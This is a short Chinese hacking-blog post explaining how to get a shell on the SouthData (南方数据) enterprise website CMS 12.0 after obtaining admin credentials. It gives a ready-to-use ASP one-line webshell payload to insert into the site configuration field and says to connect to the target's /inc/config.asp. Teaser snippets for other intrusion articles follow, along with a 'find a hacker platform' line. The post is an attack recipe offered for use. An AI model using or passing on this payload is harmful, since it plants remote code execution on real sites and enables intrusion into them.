南方数据企业网站管理系统12.0拿SHELL ***

hacker4年前 (2020-05-31)黑客文章645

南方数据企业网站管理系统12.0插配置文件拿SHELL

在我们拿到南方数据企业管理系统后台账号密码后，可以使用下面的 *** 来拿shell

进入后台后点击系统管理网站配置

随便找个地方修改成

“%><%eval request(“qxz”)%><%Const nidaye=”xzlbb.com

然后用一句话客户端连接http://目标网站/inc/config.asp就OK了！

标签: 黑客技术

返回列表

Fiddler是一款免费代理商调节专用工具。 Fiddler是一个蛮好用的抓包工具，能够将数据传输推送与接纳的数据文件开展捕获、再发、编写、拷贝到等实际操作。还可以用于检验网络信息安全...

科汛网站程序任意用户上传漏洞利用, 主要也要用到iis6.0的解析漏洞,如果服务器是其他版本的IIS则无效。搜索关键字： Powered By KesionCMS V5.5 inur...

坚信许多都了解Sqlmap，可是却不清楚怎样根据sqlmap来引入对不对？今日将实战演练教大伙儿怎样真实的应用sqlmap来引入？要是了解这12种方式，包你只必须应用Sqlmap这一个专用工具把握...

如今许多的网络技术应用都被服务器防火墙维护着，那大家平常在开展扫描仪的情况下，通常一无所获，因而我们在应对服务器防火墙/IDS/IPS的安全防护运用时，该怎么使用nmap绕开这种服务器防火墙的限定开...

前言：现在的网络，脚本入侵十分的流行，而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜，都会为它那巨大的威力和灵活多变的招式所着迷！正是因为注入攻击的流行，使的市面上的注入工具层...

Wireshark是一款十分时兴的网络抓包分析系统,作用十分强劲。能够提取各种各样互联网封包,显示信息互联网封包的详细资料。wireshark是十分时兴的互联网封包分析系统,作用十分强劲。应用wir...

找黑客平台